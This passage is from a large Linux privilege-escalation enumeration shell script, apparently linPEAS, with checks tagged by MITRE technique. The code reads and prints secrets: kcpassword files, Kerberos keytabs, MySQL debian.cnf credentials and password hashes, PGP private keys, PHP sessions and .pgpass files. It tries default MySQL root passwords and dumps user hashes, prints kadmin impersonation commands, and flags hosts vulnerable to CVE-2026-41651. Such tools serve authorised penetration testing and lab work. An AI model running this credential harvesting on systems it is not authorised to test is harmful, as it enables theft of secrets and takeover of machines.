  10960     elif echo $f | grep -q gitlab.rb; then
  10961       echo "Found $f" | sed "s,$f,${SED_RED},"
  10962       cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
  10963     fi
  10964     echo ""
  10965   done
  10966   echo ""
  10967 fi
  10968 
  10969 fi
  10970 
  10971 if check_mitre_filter "T1555.001"; then
  10972 if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then
  10973   print_2title "Analyzing kcpassword files" "T1555.001"
  10974   print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#kcpassword"
  10975   printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do
  10976     echo "$f" | sed -${E} "s,.*,${SED_RED},"
  10977     base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  10978   done
  10979   echo ""
  10980 fi
  10981 
  10982 fi
  10983 
  10984 if check_mitre_filter "T1558.003"; then
  10985 kadmin_exists="$(command -v kadmin || echo -n '')"
  10986 klist_exists="$(command -v klist || echo -n '')"
  10987 kinit_exists="$(command -v kinit || echo -n '')"
  10988 if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
  10989   print_2title "Searching kerberos conf files and tickets" "T1558.003"
  10990   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory"
  10991   if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
  10992   if [ "$kinit_exists" ]; then echo "kadmin was found on $kinit_exists" | sed "s,$kinit_exists,${SED_RED},"; fi
  10993   if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
  10994   ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
  10995   if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
  10996   else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
  10997   fi
  10998   (env || printenv) 2>/dev/null | grep -E "^KRB5" | sed -${E} "s,KRB5,${SED_RED},g"
  10999   printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
  11000     if [ -r "$f" ]; then
  11001       if echo "$f" | grep -q .k5login; then
  11002         echo ".k5login file (users with access to the user who has this file in his home)"
  11003         cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
  11004       elif echo "$f" | grep -q keytab; then
  11005         echo ""
  11006         echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
  11007         klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
  11008         printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
  11009           if [ "$l" ] && echo "$l" | grep -q "@"; then
  11010             printf "$ITALIC  --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
  11011             #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
  11012             #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
  11013           fi
  11014         done
  11015       elif echo "$f" | grep -q krb5.conf; then
  11016         ls -l "$f"
  11017         cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
  11018       elif echo "$f" | grep -q kadm5.acl; then
  11019         ls -l "$f" 
  11020         cat "$f" 2>/dev/null
  11021       elif echo "$f" | grep -q sssd.conf; then
  11022         ls -l "$f"
  11023         cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
  11024       elif echo "$f" | grep -q secrets.ldb; then
  11025         echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
  11026         ls -l "$f"
  11027       elif echo "$f" | grep -q .secrets.mkey; then
  11028         echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
  11029         ls -l "$f"
  11030       fi
  11031     fi
  11032   done
  11033   ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
  11034   klist 2>/dev/null || echo_not_found "klist"
  11035   echo ""
  11036 fi
  11037 
  11038 fi
  11039 
  11040 if check_mitre_filter "T1190"; then
  11041 if [ "$PSTORAGE_LOG4SHELL" ] || [ "$DEBUG" ]; then
  11042   print_2title "Searching Log4Shell vulnerable libraries" "T1190"
  11043   printf "%s\n" "$PSTORAGE_LOG4SHELL" | while read f; do
  11044     echo "$f" | grep -E "log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6])" | sed -${E} "s,log4j\-core\-(1\.[^0]|2\.[0-9][^0-9]|2\.1[0-6]),${SED_RED},";
  11045   done
  11046   echo ""
  11047 fi
  11048 
  11049 fi
  11050 
  11051 if check_mitre_filter "T1552.001"; then
  11052 if [ "$PSTORAGE_LOGSTASH" ] || [ "$DEBUG" ]; then
  11053   print_2title "Searching logstash files" "T1552.001"
  11054   printf "$PSTORAGE_LOGSTASH"
  11055   printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
  11056     if [ -r "$d/startup.options" ]; then
  11057       echo "Logstash is running as user:"
  11058       cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
  11059     fi
  11060     cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
  11061     cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
  11062   done
  11063 fi
  11064 echo ""
  11065 
  11066 fi
  11067 
  11068 if check_mitre_filter "T1552.001"; then
  11069 if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
  11070   print_2title "Searching mysql credentials and exec" "T1552.001"
  11071   printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
  11072     if [ -f "$d" ] && ! [ "$(basename $d)" = "mysql" ]; then # Only interested in "mysql" that are folders (filesaren't the ones with creds)
  11073       echo "Potential file containing credentials:"
  11074       ls -l "$d"
  11075       if [ "$STRINGS" ]; then
  11076         strings "$d"
  11077       else
  11078         echo "Strings not found, cat the file and check it to get the creds"
  11079       fi
  11080     else
  11081       for f in $(find $d -name debian.cnf 2>/dev/null); do
  11082         if [ -r "$f" ]; then
  11083           echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
  11084           cat "$f"
  11085         fi
  11086       done
  11087       for f in $(find $d -name user.MYD 2>/dev/null); do
  11088         if [ -r "$f" ]; then
  11089           echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
  11090           grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" "$f" | grep -v "mysql_native_password"
  11091         fi
  11092       done
  11093       for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
  11094         if [ -r "$f" ]; then
  11095           u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
  11096           echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
  11097         fi
  11098       done
  11099       for f in $(find $d -name my.cnf 2>/dev/null); do
  11100         if [ -r "$f" ]; then
  11101           echo "Found readable $f"
  11102           grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
  11103         fi
  11104       done
  11105     fi
  11106     mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep -Ev '^lib_mysqludf_sys.so:$' | grep "lib_mysqludf_sys\.so")
  11107     if [ "$mysqlexec" ]; then
  11108       echo "Found $mysqlexec. $(whereis lib_mysqludf_sys.so)"
  11109       echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
  11110     fi
  11111   done
  11112 fi
  11113 echo ""
  11114 #-- SI) Mysql version
  11115 if [ "$(command -v mysql || echo -n '')" ] || [ "$(command -v mysqladmin || echo -n '')" ] || [ "$DEBUG" ]; then
  11116   print_2title "MySQL version" "T1552.001"
  11117   mysql --version 2>/dev/null || echo_not_found "mysql"
  11118   mysqluser=$(systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1)
  11119   if [ "$mysqluser" ]; then
  11120     echo "MySQL user: $mysqluser" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
  11121   fi
  11122   echo ""
  11123   echo ""
  11124   #-- SI) Mysql connection root/root
  11125   print_list "MySQL connection using default root/root ........... "
  11126   mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
  11127   if [ "$mysqlconnect" ]; then
  11128     echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11129     mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  11130   else echo_no
  11131   fi
  11132   #-- SI) Mysql connection root/toor
  11133   print_list "MySQL connection using root/toor ................... "
  11134   mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
  11135   if [ "$mysqlconnect" ]; then
  11136     echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11137     mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  11138   else echo_no
  11139   fi
  11140   #-- SI) Mysql connection root/NOPASS
  11141   mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
  11142   print_list "MySQL connection using root/NOPASS ................. "
  11143   if [ "$mysqlconnectnopass" ]; then
  11144     echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11145     mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  11146     mysql -u root -e "SELECT User,Host,plugin FROM mysql.user;" 2>/dev/null | sed -${E} "s,auth_socket|unix_socket|plugin,${SED_RED},g"
  11147     mysql -u root -e "SHOW VARIABLES LIKE 'secure_file_priv'; SHOW VARIABLES LIKE 'local_infile';" 2>/dev/null | sed -${E} "s,secure_file_priv|local_infile,${SED_RED},g"
  11148   else echo_no
  11149   fi
  11150   echo ""
  11151 fi
  11152 ### This section checks if MySQL (mysqld) is running as root and if its version is 4.x or 5.x to refer a known local privilege escalation exploit! ###
  11153 # Find the mysqld process
  11154 process_info=$(ps aux | grep '[m]ysqld' | head -n1)
  11155 if [ -z "$process_info" ]; then
  11156   echo "MySQL process not found." | sed -${E} "s,.*,${SED_GREEN},"
  11157 else
  11158   # Extract the process user
  11159   mysqluser=$(echo "$process_info" | awk '{print $1}')
  11160   # Get the MySQL version string
  11161   version_output=$(mysqld --version 2>&1)
  11162   # Extract the version number (expects format like X.Y.Z)
  11163   version=$(echo "$version_output" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+' | head -n1)
  11164   if [ -z "$version" ]; then
  11165     echo "Unable to determine MySQL version." | sed -${E} "s,.*,${SED_GREEN},"
  11166   else
  11167     # Extract the major version number (X from X.Y.Z)
  11168     major_version=$(echo "$version" | cut -d. -f1)
  11169     # Check if MySQL is running as root and if the version is either 4.x or 5.x
  11170     if [ "$mysqluser" = "root" ] && { [ "$major_version" -eq 4 ] || [ "$major_version" -eq 5 ]; }; then
  11171       echo "MySQL is running as root with version $version. This is a potential local privilege escalation vulnerability!" | sed -${E} "s,.*,${SED_RED},"
  11172       echo "\tRefer to: https://www.exploit-db.com/exploits/1518" | sed -${E} "s,.*,${SED_YELLOW},"
  11173       echo "\tRefer to: https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf" | sed -${E} "s,.*,${SED_YELLOW},"
  11174     else
  11175       echo "MySQL is running as user '$mysqluser' with version $version." | sed -${E} "s,.*,${SED_GREEN},"
  11176     fi
  11177     ### ------------------------------------------------------------------------------------------------------------------------------------------------ ###
  11178   fi
  11179 fi
  11180 
  11181 fi
  11182 
  11183 if check_mitre_filter "T1552.004"; then
  11184 if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then
  11185   print_2title "Analyzing PGP-GPG Files (limit 70)"
  11186     ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null
  11187     ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null
  11188     (command -v netpgp || echo_not_found "netpgp") 2>/dev/null
  11189     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11190     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11191     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.asc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11192     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secring\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secring.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secring\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secring\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11193     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"pubring\.kbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pubring.kbx"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "pubring\.kbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pubring\.kbx$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11194     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"trustdb\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "trustdb.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "trustdb\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,trustdb\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11195     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"gpg-agent\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gpg-agent.conf"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "gpg-agent\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gpg-agent\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11196     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secret\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secret.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secret\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secret\.asc$,${SED_RED},"; done; echo "";
  11197     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"private-keys-v1\.d/.*\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "private-keys-v1.d/*.key"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "private-keys-v1\.d/.*\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,private-keys-v1\.d/.*\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11198     if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11199 fi
  11200 
  11201 
  11202 fi
  11203 
  11204 if check_mitre_filter "T1552.001"; then
  11205 if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then
  11206   print_2title "Analyzing PHP Sessions Files (limit 70)"
  11207     ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions
  11208     if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sess_*"; fi; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11209 fi
  11210 
  11211 
  11212 fi
  11213 
  11214 if check_mitre_filter "T1068"; then
  11215 # Contributor: Arjay Saguisa
  11216 pk_dpkg_fixed_version() {
  11217   pk_fixed_version=""
  11218   pk_fixed_label=""
  11219   [ -r /etc/os-release ] || return
  11220   pk_distro_id=""
  11221   pk_distro_codename=""
  11222   # shellcheck disable=SC1091
  11223   . /etc/os-release
  11224   pk_distro_id="${ID:-}"
  11225   pk_distro_codename="$(sed -nE 's/^VERSION_CODENAME=\"?([^"]*)\"?$/\1/p' /etc/os-release | head -n1)"
  11226   case "${pk_distro_id}:${pk_distro_codename}" in
  11227     debian:bullseye|raspbian:bullseye)
  11228       pk_fixed_version="1.2.2-2+deb11u1"
  11229       pk_fixed_label="Debian/Raspbian bullseye fixed version"
  11230       ;;
  11231     debian:bookworm|raspbian:bookworm)
  11232       pk_fixed_version="1.2.6-5+deb12u1"
  11233       pk_fixed_label="Debian/Raspbian bookworm fixed version"
  11234       ;;
  11235     debian:trixie|raspbian:trixie)
  11236       pk_fixed_version="1.3.1-1+deb13u1"
  11237       pk_fixed_label="Debian/Raspbian trixie fixed version"
  11238       ;;
  11239     ubuntu:xenial)
  11240       pk_fixed_version="0.8.17-4ubuntu6~gcc5.4ubuntu1.5+esm1"
  11241       pk_fixed_label="Ubuntu 16.04 ESM fixed version"
  11242       ;;
  11243     ubuntu:bionic)
  11244       pk_fixed_version="1.1.9-1ubuntu2.18.04.6+esm1"
  11245       pk_fixed_label="Ubuntu 18.04 ESM fixed version"
  11246       ;;
  11247     ubuntu:focal)
  11248       pk_fixed_version="1.1.13-2ubuntu1.1+esm1"
  11249       pk_fixed_label="Ubuntu 20.04 ESM fixed version"
  11250       ;;
  11251     ubuntu:jammy)
  11252       pk_fixed_version="1.2.5-2ubuntu3.1"
  11253       pk_fixed_label="Ubuntu 22.04 fixed version"
  11254       ;;
  11255     ubuntu:noble)
  11256       pk_fixed_version="1.2.8-2ubuntu1.5"
  11257       pk_fixed_label="Ubuntu 24.04 fixed version"
  11258       ;;
  11259     ubuntu:questing)
  11260       pk_fixed_version="1.3.1-1ubuntu1.1"
  11261       pk_fixed_label="Ubuntu 25.10 fixed version"
  11262       ;;
  11263     ubuntu:resolute)
  11264       pk_fixed_version="1.3.4-3ubuntu1"
  11265       pk_fixed_label="Ubuntu 26.04 fixed version"
  11266       ;;
  11267   esac
  11268 }
  11269 print_2title "Checking for PackageKit Pack2TheRoot (CVE-2026-41651)" "T1068"
  11270 print_info "https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html"
  11271 pk_full=""
  11272 pk_version=""
  11273 pk_pkg_manager=""
  11274 if command -v dpkg-query >/dev/null 2>&1; then
  11275   pk_full="$(dpkg-query -W -f='$''{Version}\n' packagekit 2>/dev/null | head -n1)"
  11276   if [ -n "$pk_full" ]; then
  11277     pk_pkg_manager="dpkg"
  11278     pk_version="$(printf '%s' "$pk_full" | sed -E 's/^[0-9]+://; s/[-+~].*$//')"
  11279   fi
  11280 fi
  11281 if [ -z "$pk_version" ] && command -v rpm >/dev/null 2>&1; then
  11282   pk_full="$(rpm -qa 2>/dev/null | grep -iE '^PackageKit-[0-9]' | head -n1)"
  11283   if [ -n "$pk_full" ]; then
  11284     pk_pkg_manager="rpm"
  11285     pk_version="$(printf '%s' "$pk_full" | sed -E 's/^[Pp]ackage[Kk]it-([0-9.]+)-.*/\1/')"
  11286   fi
  11287 fi
  11288 if [ -z "$pk_version" ]; then
  11289   echo_not_found "PackageKit"
  11290 else
  11291   echo "PackageKit version detected: ${pk_full:-$pk_version}"
  11292   pk_vulnerable="no"
  11293   if [ "$pk_pkg_manager" = "dpkg" ] && command -v dpkg >/dev/null 2>&1; then
  11294     pk_dpkg_fixed_version
  11295     if [ -n "$pk_fixed_version" ]; then
  11296       if dpkg --compare-versions "$pk_full" ge "$pk_fixed_version"; then
  11297         echo "PackageKit $pk_full is at or above the ${pk_fixed_label}: $pk_fixed_version" | sed -${E} "s,.*,${SED_GREEN},"
  11298       else
  11299         echo "Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit $pk_full is below the ${pk_fixed_label}: $pk_fixed_version" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11300         pk_vulnerable="yes"
  11301       fi
  11302     fi
  11303   fi
  11304   if [ -z "$pk_fixed_version" ]; then
  11305     # Generic upstream range: >= 1.0.2 and <= 1.3.4. Distro backports are handled above.
  11306     pk_min_vuln="1.0.2"
  11307     pk_max_vuln="1.3.4"
  11308     pk_lower="$(printf '%s\n%s\n' "$pk_min_vuln" "$pk_version" | sort -V | head -n1)"
  11309     pk_higher="$(printf '%s\n%s\n' "$pk_version" "$pk_max_vuln" | sort -V | tail -n1)"
  11310     if [ "$pk_lower" = "$pk_min_vuln" ] && [ "$pk_higher" = "$pk_max_vuln" ]; then
  11311       echo "Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit $pk_version is in the upstream vulnerable range >=1.0.2 <=1.3.4" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11312       pk_vulnerable="yes"
  11313     else
  11314       echo "PackageKit $pk_version is not in the upstream vulnerable range for CVE-2026-41651" | sed -${E} "s,.*,${SED_GREEN},"
  11315     fi
  11316   fi
  11317   if [ "$pk_vulnerable" = "yes" ]; then
  11318     echo ""
  11319     print_3title "PackageKit daemon reachability"
  11320     if command -v systemctl >/dev/null 2>&1 && systemctl status packagekit >/dev/null 2>&1; then
  11321       echo "PackageKit service is loaded/running - exploitation likely possible" | sed -${E} "s,.*,${SED_RED},"
  11322     elif command -v pkcon >/dev/null 2>&1 || command -v pkmon >/dev/null 2>&1; then
  11323       echo "pkcon/pkmon present - daemon can be activated on demand via D-Bus" | sed -${E} "s,.*,${SED_RED},"
  11324     else
  11325       echo "PackageKit daemon does not appear to be reachable from this session" | sed -${E} "s,.*,${SED_GREEN},"
  11326     fi
  11327     echo ""
  11328     print_3title "IOC: emitted_finished assertion failures"
  11329     if command -v journalctl >/dev/null 2>&1; then
  11330       pk_ioc_count="$(journalctl --no-pager -u packagekit 2>/dev/null | grep -c emitted_finished)"
  11331       if [ "${pk_ioc_count:-0}" -gt 0 ] 2>/dev/null; then
  11332         echo "Found ${pk_ioc_count} 'emitted_finished' crashes in PackageKit logs - possible prior exploitation" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11333       else
  11334         echo "No emitted_finished assertion failures found in PackageKit logs"
  11335       fi
  11336     else
  11337       echo "journalctl not available - cannot check IOC"
  11338     fi
  11339   fi
  11340 fi
  11341 echo ""
  11342 
  11343 fi
  11344 
  11345 if check_mitre_filter "T1556.003"; then
  11346 pamdpass=$(grep -Ri "passwd"  ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#")
  11347 if [ "$pamdpass" ] || [ "$DEBUG" ]; then
  11348   print_2title "Passwords inside pam.d" "T1556.003"
  11349   grep -Ri "passwd"  ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
  11350   echo ""
  11351 fi
  11352 
  11353 fi
  11354 
  11355 if check_mitre_filter "T1552.001"; then
  11356 if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then
  11357   print_2title "Analyzing PostgreSQL Files (limit 70)"
  11358     echo "Version: $(warn_exec psql -V 2>/dev/null)"
  11359     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo "";
  11360     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo "";
  11361     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo "";
  11362     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo "";
  11363     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"\.pgpass$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pgpass"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "\.pgpass$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgpass$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  11364     if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin4\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin4.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin4\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin4\.db$,${SED_RED},"; done; echo "";
  11365 fi
  11366 
  11367 if [ "$TIMEOUT" ] && [ "$(command -v psql || echo -n '')" ] || [ "$DEBUG" ]; then  # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
  11368 #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
  11369   print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
  11370   if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11371   else echo_no
  11372   fi
